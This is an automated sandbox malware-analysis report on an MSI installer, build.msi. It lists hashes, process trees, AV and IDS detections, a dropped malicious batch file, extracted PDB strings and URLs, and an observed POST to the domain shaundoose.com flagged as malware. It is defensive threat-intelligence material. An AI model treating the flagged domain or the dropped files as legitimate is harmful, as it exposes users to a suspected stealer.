Edit tour

Windows Analysis Report
build.msi

Overview

General Information

Sample name:build.msi
Analysis ID:1648463
MD5:cc9a4fbbbabad106e40b7577f6dbbcc1
SHA1:4edf9195188e721a7b5f394032ddb987144f918e
SHA256:0b268732e81427c10afaa9679c60485a5c8a71c839f268b6e0e0d7c57efb3832
Tags:HUNmsiuser-smica83
Infos:

Detection

Score:72
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Checks for available system drives (often done to infect USB drives)
Contains capabilities to detect virtual machines
Creates files inside the system directory
Deletes files inside the Windows folder
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Msiexec Initiated Connection
Yara detected AdvancedInstaller

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • msiexec.exe (PID: 9184 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\build.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 5624 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 8376 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 6E1DB9555CE64326EDD6942FBB93A68E MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • launcher.exe (PID: 564 cmdline: "C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exe" MD5: C02DC2CA96FE9841963883C0FE177399)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_AdvancedInstallerYara detected AdvancedInstallerJoe Security
    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 104.21.64.101, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 8376, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49721
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-03-25T21:01:49.311225+010028292021A Network Trojan was detected192.168.2.549721104.21.64.101443TCP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: https://shaundoose.com/diagnostics.phpAI_DOWNGRADE4010AI_PRESERVE_INSTALL_TYPEPreserveInstallTypeAI_Avira URL Cloud: Label: malware
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\logd.batAvira: detection malicious, Label: BAT/Wincir.chwfc
    Source: build.msiVirustotal: Detection: 31%Perma Link
    Source: build.msiReversingLabs: Detection: 25%
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\LICENSE.electron.txtJump to behavior
    Source: unknownHTTPS traffic detected: 104.21.64.101:443 -> 192.168.2.5:49721 version: TLS 1.2
    Source: Binary string: C:\ReleaseAI\win\Release\bin\x86\embeddeduiproxy.pdb= source: build.msi
    Source: Binary string: c:\repos\clink\.build\release\~working\.build\vs2019\bin\final\clink_dll_x86.pdb source: clink_dll_x86.dll.4.dr
    Source: Binary string: ucrtbase.pdb source: build.msi
    Source: Binary string: C:\projects\src\out\Default\ffmpeg.dll.pdb source: ffmpeg.dll.4.dr
    Source: Binary string: Microsoft.Web.WebView2.Core.pdbGCTL source: build.msi
    Source: Binary string: d:\build\ob\bora-16964525\cayman_libsigcpp2\libsigcpp2\src\MSVC_Net2015\Win32\Release\sigc-2.0.pdb## source: sigc-2.0.dll.4.dr
    Source: Binary string: C:\ReleaseAI\win\Release\WinUiBootstrapperEui\WinUiBootstrapperEui.pdb source: build.msi
    Source: Binary string: Unable to get temp pathcopy_dllclink\dll_cache\1.4.6.8b1dec_%08xUnable to create path '%s'\clink_dll_x64.dll.originFailed to create origin file at '%s'Failed to copy DLL to '%s'.pdbUnable to get DLL version for '%s'check_dll_version\Unable to query DLL version info for '%s'DLL version: %08x %08x%s%swait_monitor::on_waited source: clink_dll_x64.dll.4.dr
    Source: Binary string: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\crashinfo\libmupdf.pdb source: launcher.exe, 00000009.00000002.2597059561.000001D54B1E8000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: libmupdf.pdb source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmp
    Source: Binary string: D:\a\_work\1\s\140_release\vcrt_fwd_x86_release\Release\msvcp140_app.pdb source: build.msi
    Source: Binary string: Bookmark Shortcuts%.2flnkfitwidthfitpage"%s" -page %d -view "%s" -zoom %s -scroll %d,%dfitcontentSelect folder with PDF filesBookmark shortcut to page %s of %s*.xps;*.oxps*.pdf*.ps;*.eps*.djvu*.chm*.cbz;*.cbr;*.cb7;*.cbt*.svgSVG documents*.mobi*.epub*.pdb;*.prc*.fb2;*.fb2z;*.zfb2;*.fb2.zip*.bmp;*.dib;*.gif;*.jpg;*.jpeg;*.jxr;*.png;*.tga;*.tif;*.tiff;*.webp;*.heic;*.avifImagesAll supported documents*.txt;*.log;*.nfo;file_id.diz;read.me;*.tcrVK_DOWN source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmp
    Source: Binary string: SumatraPDF-dll.pdb source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmp
    Source: Binary string: E:\BA\201\s\140_release\vcrt_fwd_x86_release\Release\vcomp140_app.pdb source: build.msi
    Source: Binary string: D:\a\1\s\Win32\Release\Microsoft.Toolkit.Win32.UI.XamlApplication\Microsoft.Toolkit.Win32.UI.XamlHost.pdb!! source: build.msi
    Source: Binary string: C:\Users\kjk\src\sumatrapdf\out\rel64\SumatraPDF.pdb source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmp
    Source: Binary string: -64.pdb.lzsa source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmp
    Source: Binary string: </html>.pdb<<html> source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmp
    Source: Binary string: D:\a\1\s\Win32\Release\Microsoft.Toolkit.Win32.UI.XamlApplication\Microsoft.Toolkit.Win32.UI.XamlHost.pdb source: build.msi
    Source: Binary string: C:\projects\src\out\Default\vk_swiftshader.dll.pdb source: vk_swiftshader.dll.4.dr
    Source: Binary string: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\crashinfo\SumatraPDF-dll.pdb source: launcher.exe, 00000009.00000002.2597059561.000001D54B1E0000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: Microsoft.Web.WebView2.Core.pdb source: build.msi
    Source: Binary string: ucrtbase.pdbUGP source: build.msi
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: build.msi, MSI6E8B.tmp.4.dr, MSI6501.tmp.4.dr
    Source: Binary string: ITSF.txt.js.json.xml.logfile_id.dizread.me.nfo.tcr.ps.ps.gz.eps.fb2.fb2z.fbz.zfb2.fb2.zip.cbz.cbr.cb7.cbt.pdf.xps.oxps.chm.png.jpg.jpeg.gif.tif.tiff.bmp.tga.jxr.hdp.wdp.webp.epub.mobi.prc.azw.azw1.azw3.pdb.html.htm.xhtml.svg.djvu.jp2.zip.rar.7z.heic.avif.tarfoo.epubfoo.JP2Rar! source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmp
    Source: Binary string: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\crashinfo\SumatraPDF.pdb source: launcher.exe, 00000009.00000002.2597059561.000001D54B1E8000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\Dev\elevate\bin\x86\Release\Elevate.pdb source: elevate.exe.4.dr
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\DataUploader.pdb source: build.msi
    Source: Binary string: C:\ReleaseAI\win\Release\WinUiBootstrapperEui\WinUiBootstrapperEui.pdb)) source: build.msi
    Source: Binary string: d:\build\ob\bora-16964525\cayman_libsigcpp2\libsigcpp2\src\MSVC_Net2015\Win32\Release\sigc-2.0.pdb source: sigc-2.0.dll.4.dr
    Source: Binary string: c:\repos\clink\.build\release\~working\.build\vs2019\bin\final\clink_dll_x64.pdb source: clink_dll_x64.dll.4.dr
    Source: Binary string: Unable to get temp pathcopy_dllclink\dll_cache\1.4.6.8b1dec_%08xUnable to create path '%s'\clink_dll_x86.dll.originFailed to create origin file at '%s'Failed to copy DLL to '%s'.pdbUnable to get DLL version for '%s'check_dll_version\Unable to query DLL version info for '%s'DLL version: %08x %08x%s%swait_monitor::on_waited source: clink_dll_x86.dll.4.dr
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\DataUploader.pdbj source: build.msi
    Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: build.msi
    Source: Binary string: E:\BA\201\s\140_release\vcrt_fwd_x86_release\Release\vcamp140_app.pdb source: build.msi
    Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdbGCTL source: build.msi
    Source: Binary string: E:\BA\201\s\140_release\vcrt_fwd_x86_release\Release\vccorlib140_app.pdb source: build.msi
    Source: Binary string: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\crashinfo\libmupdf.pdbK_ source: launcher.exe, 00000009.00000002.2597059561.000001D54B1E8000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\crashinfo\SumatraPDF-dll.pdbo Verfa source: launcher.exe, 00000009.00000002.2597059561.000001D54B1E0000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: build.msi
    Source: Binary string: D:\build\ob\bora-21139696\bora\build\build\LIBRARIES\adjperm\win32\release\adjperm.pdb source: adjperm.dll.4.dr
    Source: Binary string: https://www.sumatrapdfreader.org/dl/rel/SumatraPDF-3.5.2-64.pdb.lzsaI source: launcher.exe, 00000009.00000002.2597059561.000001D54B1E8000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: https://www.sumatrapdfreader.org/dl/rel/SumatraPDF-3.5.2-64.pdb.lzsa source: launcher.exe, 00000009.00000002.2597059561.000001D54B1E8000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\a\_work\1\s\BuildOutput\Release\x86\Microsoft.UI.Xaml\Microsoft.UI.Xaml.pdb source: build.msi
    Source: Binary string: D:\a\_work\1\s\140_release\vcrt_fwd_x86_release\Release\vcruntime140_app.pdb source: build.msi
    Source: Binary string: SumatraPDF.pdb source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\bin\x86\embeddeduiproxy.pdb source: build.msi
    Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: build.msi
    Source: Binary string: SumatraPDF.pdbSumatraPDF-dll.pdblibmupdf.pdbInstallCrashHandler: skipping because !crashDumpPath source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmp
    Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdbGCTL source: build.msi
    Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: c:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2829202 - Severity 1 - ETPRO MALWARE MSIL/Zbrain PUP/Stealer Installer UA : 192.168.2.5:49721 -> 104.21.64.101:443
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficDNS traffic detected: DNS query: shaundoose.com
    Source: unknownHTTP traffic detected: POST /diagnostics.php HTTP/1.1Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: AdvancedInstallerHost: shaundoose.comContent-Length: 53Cache-Control: no-cache
    Source: build.msiString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
    Source: adjperm.dll.4.dr, sigc-2.0.dll.4.dr, rufus-4.6p.exe.4.dr, elevate.exe.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
    Source: build.msiString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
    Source: adjperm.dll.4.dr, sigc-2.0.dll.4.dr, elevate.exe.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
    Source: adjperm.dll.4.dr, sigc-2.0.dll.4.dr, rufus-4.6p.exe.4.dr, elevate.exe.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
    Source: adjperm.dll.4.dr, sigc-2.0.dll.4.dr, rufus-4.6p.exe.4.dr, elevate.exe.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
    Source: build.msiString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA.crt0
    Source: rufus-4.6p.exe.4.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
    Source: rufus-4.6p.exe.4.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
    Source: rufus-4.6p.exe.4.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
    Source: elevate.exe.4.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
    Source: elevate.exe.4.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
    Source: adjperm.dll.4.dr, sigc-2.0.dll.4.dr, rufus-4.6p.exe.4.dr, elevate.exe.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
    Source: build.msiString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
    Source: build.msiString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
    Source: adjperm.dll.4.dr, sigc-2.0.dll.4.dr, elevate.exe.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
    Source: adjperm.dll.4.dr, sigc-2.0.dll.4.dr, rufus-4.6p.exe.4.dr, elevate.exe.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
    Source: elevate.exe.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
    Source: build.msiString found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA.crl0E
    Source: build.msiString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
    Source: build.msiString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
    Source: adjperm.dll.4.dr, sigc-2.0.dll.4.dr, elevate.exe.4.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
    Source: build.msiString found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA.crl0K
    Source: build.msiString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
    Source: rufus-4.6p.exe.4.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
    Source: rufus-4.6p.exe.4.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
    Source: elevate.exe.4.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
    Source: elevate.exe.4.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
    Source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://docs.oasis-open.org/ns/office/1.2/meta/odf#ContentFile
    Source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://docs.oasis-open.org/ns/office/1.2/meta/odf#StylesFile
    Source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://docs.oasis-open.org/ns/office/1.2/meta/pkg#
    Source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://docs.oasis-open.org/ns/office/1.2/meta/pkg#Document
    Source: elevate.exe.4.drString found in binary or memory: http://int3.de/
    Source: rufus-4.6p.exe.4.drString found in binary or memory: http://ocsp.comodoca.com0
    Source: adjperm.dll.4.dr, sigc-2.0.dll.4.dr, elevate.exe.4.drString found in binary or memory: http://ocsp.digicert.com0
    Source: adjperm.dll.4.dr, sigc-2.0.dll.4.dr, rufus-4.6p.exe.4.dr, elevate.exe.4.drString found in binary or memory: http://ocsp.digicert.com0A
    Source: build.msi, adjperm.dll.4.dr, sigc-2.0.dll.4.dr, rufus-4.6p.exe.4.dr, elevate.exe.4.drString found in binary or memory: http://ocsp.digicert.com0C
    Source: build.msiString found in binary or memory: http://ocsp.digicert.com0K
    Source: build.msiString found in binary or memory: http://ocsp.digicert.com0N
    Source: build.msiString found in binary or memory: http://ocsp.digicert.com0O
    Source: adjperm.dll.4.dr, sigc-2.0.dll.4.dr, rufus-4.6p.exe.4.dr, elevate.exe.4.drString found in binary or memory: http://ocsp.digicert.com0X
    Source: rufus-4.6p.exe.4.dr, elevate.exe.4.drString found in binary or memory: http://ocsp.sectigo.com0
    Source: rufus-4.6p.exe.4.drString found in binary or memory: http://ocsp.sectigo.com0$
    Source: clink.bat.4.drString found in binary or memory: http://opensource.org/licenses/MIT
    Source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://schemas.openxps.org/oxps/v1.0/documentstructure
    Source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://schemas.openxps.org/oxps/v1.0/fixedrepresentation
    Source: Info.plist0.4.dr, CodeResources.4.dr, Info.plist.4.drString found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
    Source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://www.daisy.org/z3986/2005/ncx/
    Source: build.msi, adjperm.dll.4.dr, sigc-2.0.dll.4.dr, elevate.exe.4.drString found in binary or memory: http://www.digicert.com/CPS0
    Source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://www.gribuser.ru/xml/fictionbook/2.0
    Source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd
    Source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://www.idpf.org/2007/opf
    Source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://www.idpf.org/2007/opfapplication/xhtml
    Source: adjperm.dll.4.dr, sigc-2.0.dll.4.drString found in binary or memory: http://www.vmware.com/0/
    Source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://://https://translate.google.com/?op=translate&sl=auto&tl=$
    Source: build.msiString found in binary or memory: https://aka.ms/winui2/webview2download/Reload():
    Source: clink_dll_x86.dll.4.dr, clink_dll_x64.dll.4.drString found in binary or memory: https://api.github.com/repos/%s/releases/latest
    Source: clink_dll_x86.dll.4.dr, clink_dll_x64.dll.4.drString found in binary or memory: https://chrisant996.github.io/clink/clink.html#using-history-expansion
    Source: el.pak.4.dr, es.pak.4.dr, bg.pak.4.dr, fr.pak.4.drString found in binary or memory: https://chrome.google.com/webstore/category/extensions
    Source: bg.pak.4.drString found in binary or memory: https://chrome.google.com/webstore?hl=bg&category=theme81https://myactivity.google.com/myactivity/?u
    Source: bg.pak.4.drString found in binary or memory: https://chrome.google.com/webstore?hl=bgCtrl$1
    Source: el.pak.4.drString found in binary or memory: https://chrome.google.com/webstore?hl=el&category=theme81https://myactivity.google.com/myactivity/?u
    Source: el.pak.4.drString found in binary or memory: https://chrome.google.com/webstore?hl=elCtrl$1
    Source: es.pak.4.drString found in binary or memory: https://chrome.google.com/webstore?hl=es&category=theme81https://myactivity.google.com/myactivity/?u
    Source: es.pak.4.drString found in binary or memory: https://chrome.google.com/webstore?hl=esCtrl$1
    Source: fr.pak.4.drString found in binary or memory: https://chrome.google.com/webstore?hl=fr&category=theme81https://myactivity.google.com/myactivity/?u
    Source: fr.pak.4.drString found in binary or memory: https://chrome.google.com/webstore?hl=frCtrl$1
    Source: el.pak.4.dr, es.pak.4.dr, bg.pak.4.dr, fr.pak.4.drString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherEnabled
    Source: el.pak.4.dr, es.pak.4.dr, bg.pak.4.dr, fr.pak.4.drString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherExternalGreylistUrl
    Source: el.pak.4.dr, es.pak.4.dr, bg.pak.4.dr, fr.pak.4.drString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherExternalSitelistUrl
    Source: el.pak.4.dr, es.pak.4.dr, bg.pak.4.dr, fr.pak.4.drString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUrlGreylist
    Source: el.pak.4.dr, es.pak.4.dr, bg.pak.4.dr, fr.pak.4.drString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUrlList
    Source: el.pak.4.dr, es.pak.4.dr, bg.pak.4.dr, fr.pak.4.drString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUseIeSitelist
    Source: el.pak.4.dr, es.pak.4.dr, bg.pak.4.dr, fr.pak.4.drString found in binary or memory: https://chromestatus.com/features#browsers.chrome.status%3A%22Deprecated%22
    Source: clink_dll_x64.dll.4.drString found in binary or memory: https://github.com/%s/releases
    Source: elevate.exe.4.drString found in binary or memory: https://github.com/Eugeny/tabby#readme0
    Source: clink_dll_x86.dll.4.dr, clink_dll_x64.dll.4.drString found in binary or memory: https://github.com/chrisant996/clink
    Source: CHANGES.4.drString found in binary or memory: https://github.com/chrisant996/clink)
    Source: CHANGES.4.drString found in binary or memory: https://github.com/chrisant996/clink/issues/106);
    Source: CHANGES.4.drString found in binary or memory: https://github.com/chrisant996/clink/issues/107);
    Source: CHANGES.4.drString found in binary or memory: https://github.com/chrisant996/clink/issues/111);
    Source: CHANGES.4.drString found in binary or memory: https://github.com/chrisant996/clink/issues/113);
    Source: CHANGES.4.drString found in binary or memory: https://github.com/chrisant996/clink/issues/114);
    Source: CHANGES.4.drString found in binary or memory: https://github.com/chrisant996/clink/issues/118);
    Source: CHANGES.4.drString found in binary or memory: https://github.com/chrisant996/clink/issues/13)
    Source: CHANGES.4.drString found in binary or memory: https://github.com/chrisant996/clink/issues/16)
    Source: CHANGES.4.drString found in binary or memory: https://github.com/chrisant996/clink/issues/17)
    Source: CHANGES.4.drString found in binary or memory: https://github.com/chrisant996/clink/issues/18)
    Source: CHANGES.4.drString found in binary or memory: https://github.com/chrisant996/clink/issues/20);
    Source: CHANGES.4.drString found in binary or memory: https://github.com/chrisant996/clink/issues/25);
    Source: CHANGES.4.drString found in binary or memory: https://github.com/chrisant996/clink/issues/28);
    Source: CHANGES.4.drString found in binary or memory: https://github.com/chrisant996/clink/issues/32);
    Source: CHANGES.4.drString found in binary or memory: https://github.com/chrisant996/clink/issues/33);
    Source: CHANGES.4.drString found in binary or memory: https://github.com/chrisant996/clink/issues/35)
    Source: CHANGES.4.drString found in binary or memory: https://github.com/chrisant996/clink/issues/41);
    Source: CHANGES.4.drString found in binary or memory: https://github.com/chrisant996/clink/issues/42);
    Source: CHANGES.4.drString found in binary or memory: https://github.com/chrisant996/clink/issues/44);
    Source: CHANGES.4.drString found in binary or memory: https://github.com/chrisant996/clink/issues/45);
    Source: CHANGES.4.drString found in binary or memory: https://github.com/chrisant996/clink/issues/46);
    Source: CHANGES.4.drString found in binary or memory: https://github.com/chrisant996/clink/issues/47);
    Source: CHANGES.4.drString found in binary or memory: https://github.com/chrisant996/clink/issues/48);
    Source: CHANGES.4.drString found in binary or memory: https://github.com/chrisant996/clink/issues/50);
    Source: CHANGES.4.drString found in binary or memory: https://github.com/chrisant996/clink/issues/57);
    Source: CHANGES.4.drString found in binary or memory: https://github.com/chrisant996/clink/issues/60);
    Source: CHANGES.4.drString found in binary or memory: https://github.com/chrisant996/clink/issues/61);
    Source: CHANGES.4.drString found in binary or memory: https://github.com/chrisant996/clink/issues/62);
    Source: CHANGES.4.drString found in binary or memory: https://github.com/chrisant996/clink/issues/64);
    Source: CHANGES.4.drString found in binary or memory: https://github.com/chrisant996/clink/issues/66);
    Source: CHANGES.4.drString found in binary or memory: https://github.com/chrisant996/clink/issues/67);
    Source: CHANGES.4.drString found in binary or memory: https://github.com/chrisant996/clink/issues/69);
    Source: CHANGES.4.drString found in binary or memory: https://github.com/chrisant996/clink/issues/70);
    Source: CHANGES.4.drString found in binary or memory: https://github.com/chrisant996/clink/issues/73);
    Source: CHANGES.4.drString found in binary or memory: https://github.com/chrisant996/clink/issues/74);
    Source: CHANGES.4.drString found in binary or memory: https://github.com/chrisant996/clink/issues/76);
    Source: CHANGES.4.drString found in binary or memory: https://github.com/chrisant996/clink/issues/77);
    Source: CHANGES.4.drString found in binary or memory: https://github.com/chrisant996/clink/issues/78);
    Source: CHANGES.4.drString found in binary or memory: https://github.com/chrisant996/clink/issues/79);
    Source: CHANGES.4.drString found in binary or memory: https://github.com/chrisant996/clink/issues/80);
    Source: CHANGES.4.drString found in binary or memory: https://github.com/chrisant996/clink/issues/82);
    Source: CHANGES.4.drString found in binary or memory: https://github.com/chrisant996/clink/issues/84);
    Source: CHANGES.4.drString found in binary or memory: https://github.com/chrisant996/clink/issues/92);
    Source: CHANGES.4.drString found in binary or memory: https://github.com/chrisant996/clink/issues/93);
    Source: CHANGES.4.drString found in binary or memory: https://github.com/chrisant996/clink/issues/94);
    Source: CHANGES.4.drString found in binary or memory: https://github.com/chrisant996/clink/issues/96);
    Source: CHANGES.4.drString found in binary or memory: https://github.com/chrisant996/clink/issues/97);
    Source: CHANGES.4.drString found in binary or memory: https://github.com/chrisant996/clink/issues/99)).
    Source: CHANGES.4.drString found in binary or memory: https://github.com/cmderdev/cmder/issues/2536)).
    Source: CHANGES.4.drString found in binary or memory: https://github.com/microsoft/detours)
    Source: CHANGES.4.drString found in binary or memory: https://github.com/mridgers/clink)
    Source: CHANGES.4.drString found in binary or memory: https://github.com/mridgers/clink/issues/172)).
    Source: CHANGES.4.drString found in binary or memory: https://github.com/mridgers/clink/issues/206)).
    Source: CHANGES.4.drString found in binary or memory: https://github.com/mridgers/clink/issues/257)).
